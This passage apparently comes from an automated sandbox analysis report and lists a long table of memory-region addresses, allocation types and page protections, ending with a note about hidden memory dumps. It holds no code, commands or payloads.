|
heap
|
page read and write
|
||
|
24832000
|
heap
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
24190000
|
remote allocation
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
311D000
|
heap
|
page read and write
|
||
|
23C20000
|
heap
|
page read and write
|
||
|
30A0000
|
direct allocation
|
page read and write
|
||
|
4F70000
|
heap
|
page read and write
|
||
|
43F000
|
unkown
|
page readonly
|
||
|
2FF5000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
2B65000
|
heap
|
page read and write
|
||
|
89A7000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
50B0000
|
trusted library allocation
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
52A9000
|
heap
|
page read and write
|
||
|
795E000
|
stack
|
page read and write
|
||
|
8B10000
|
direct allocation
|
page execute and read and write
|
||
|
2F85000
|
heap
|
page read and write
|
||
|
77D1000
|
heap
|
page read and write
|
||
|
508F000
|
stack
|
page read and write
|
||
|
9AE000
|
stack
|
page read and write
|
||
|
4C7F000
|
stack
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
248AC000
|
heap
|
page read and write
|
||
|
3190000
|
trusted library allocation
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
3307000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
9290000
|
direct allocation
|
page execute and read and write
|
||
|
2FFE000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
5B3B000
|
trusted library allocation
|
page read and write
|
||
|
50C5000
|
heap
|
page read and write
|
||
|
3003000
|
heap
|
page read and write
|
||
|
50B0000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
47F000
|
unkown
|
page readonly
|
||
|
52A6000
|
trusted library allocation
|
page read and write
|
||
|
3038000
|
heap
|
page read and write
|
||
|
303C000
|
heap
|
page read and write
|
||
|
2FD0000
|
direct allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
88EE000
|
stack
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
7A1D000
|
stack
|
page read and write
|
||
|
87A9000
|
heap
|
page read and write
|
||
|
24020000
|
direct allocation
|
page read and write
|
||
|
24A4A000
|
heap
|
page read and write
|
||
|
5221000
|
heap
|
page read and write
|
||
|
2FEF000
|
heap
|
page read and write
|
||
|
50B0000
|
trusted library allocation
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
799E000
|
stack
|
page read and write
|
||
|
3023000
|
heap
|
page read and write
|
||
|
57E000
|
unkown
|
page read and write
|
||
|
5B35000
|
trusted library allocation
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
3023000
|
heap
|
page read and write
|
||
|
3023000
|
heap
|
page read and write
|
||
|
240AF000
|
stack
|
page read and write
|
||
|
242EE000
|
stack
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
50C0000
|
trusted library allocation
|
page read and write
|
||
|
3278000
|
heap
|
page read and write
|
||
|
96F000
|
stack
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
77A0000
|
heap
|
page read and write
|
||
|
53B3000
|
heap
|
page read and write
|
||
|
7853000
|
heap
|
page read and write
|
||
|
3005000
|
heap
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
2380000
|
heap
|
page read and write
|
||
|
24630000
|
heap
|
page read and write
|
||
|
2F82000
|
heap
|
page read and write
|
||
|
4F5E000
|
stack
|
page read and write
|
||
|
3006000
|
heap
|
page read and write
|
||
|
238A0000
|
direct allocation
|
page read and write
|
||
|
8936000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
19E000
|
stack
|
page read and write
|
||
|
30C0000
|
trusted library allocation
|
page read and write
|
||
|
541000
|
heap
|
page read and write
|
||
|
244ED000
|
stack
|
page read and write
|
||
|
84E0000
|
heap
|
page read and write
|
||
|
243EC000
|
stack
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
2F5F000
|
stack
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
79F000
|
unkown
|
page read and write
|
||
|
72D0000
|
heap
|
page read and write
|
||
|
2FF8000
|
heap
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
511000
|
heap
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
353D000
|
heap
|
page read and write
|
||
|
8801000
|
heap
|
page read and write
|
||
|
D7F000
|
stack
|
page read and write
|
||
|
3199000
|
trusted library allocation
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
857D000
|
stack
|
page read and write
|
||
|
75FE000
|
stack
|
page read and write
|
||
|
8510000
|
trusted library allocation
|
page read and write
|
||
|
3119000
|
heap
|
page read and write
|
||
|
3014000
|
heap
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
491000
|
unkown
|
page readonly
|
||
|
2A7B000
|
stack
|
page read and write
|
||
|
24E16000
|
unclassified section
|
page execute and read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
2B5D000
|
stack
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
8B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
491000
|
unkown
|
page readonly
|
||
|
280F000
|
stack
|
page read and write
|
||
|
8715000
|
heap
|
page read and write
|
||
|
88F0000
|
direct allocation
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
329F000
|
stack
|
page read and write
|
||
|
23880000
|
direct allocation
|
page read and write
|
||
|
24D99000
|
unclassified section
|
page execute and read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
503F000
|
stack
|
page read and write
|
||
|
30DE000
|
stack
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
6DF0000
|
remote allocation
|
page execute and read and write
|
||
|
880B000
|
heap
|
page read and write
|
||
|
895B000
|
heap
|
page read and write
|
||
|
2FF5000
|
heap
|
page read and write
|
||
|
2FE9000
|
heap
|
page read and write
|
||
|
51C000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
2FEC000
|
heap
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
6159000
|
trusted library allocation
|
page read and write
|
||
|
325E000
|
stack
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
2B64000
|
heap
|
page read and write
|
||
|
8670000
|
trusted library allocation
|
page execute and read and write
|
||
|
87FA000
|
heap
|
page read and write
|
||
|
47F000
|
unkown
|
page readonly
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
3080000
|
direct allocation
|
page read and write
|
||
|
24190000
|
remote allocation
|
page read and write
|
||
|
2A76000
|
stack
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
8B00000
|
heap
|
page read and write
|
||
|
65E000
|
stack
|
page read and write
|
||
|
2442E000
|
stack
|
page read and write
|
||
|
4CD1000
|
heap
|
page read and write
|
||
|
24832000
|
heap
|
page read and write
|
||
|
247BA000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
8900000
|
direct allocation
|
page read and write
|
||
|
24DB3000
|
unclassified section
|
page execute and read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
3260000
|
heap
|
page readonly
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
4C3E000
|
stack
|
page read and write
|
||
|
51AF000
|
trusted library allocation
|
page read and write
|
||
|
2FEC000
|
heap
|
page read and write
|
||
|
2B9D000
|
stack
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
3076000
|
heap
|
page read and write
|
||
|
8940000
|
direct allocation
|
page read and write
|
||
|
7870000
|
heap
|
page read and write
|
||
|
301E000
|
heap
|
page read and write
|
||
|
300A000
|
heap
|
page read and write
|
||
|
24591000
|
direct allocation
|
page execute and read and write
|
||
|
87C5000
|
heap
|
page read and write
|
||
|
3003000
|
heap
|
page read and write
|
||
|
23850000
|
direct allocation
|
page read and write
|
||
|
A55000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
24220000
|
heap
|
page read and write
|
||
|
2FE0000
|
direct allocation
|
page read and write
|
||
|
2A5C000
|
stack
|
page read and write
|
||
|
3023000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
4F79000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
300A000
|
heap
|
page read and write
|
||
|
84D7000
|
stack
|
page read and write
|
||
|
2FEC000
|
heap
|
page read and write
|
||
|
245A6000
|
direct allocation
|
page execute and read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
8930000
|
direct allocation
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
3042000
|
heap
|
page read and write
|
||
|
2B65000
|
heap
|
page read and write
|
||
|
79DE000
|
stack
|
page read and write
|
||
|
87F9000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
2FE1000
|
heap
|
page read and write
|
||
|
8730000
|
heap
|
page read and write
|
||
|
42A000
|
unkown
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
3001000
|
heap
|
page read and write
|
||
|
9E20000
|
direct allocation
|
page execute and read and write
|
||
|
8948000
|
heap
|
page read and write
|
||
|
2426C000
|
stack
|
page read and write
|
||
|
2DDC000
|
stack
|
page read and write
|
||
|
303C000
|
heap
|
page read and write
|
There are 693 hidden memdumps, click here to show them.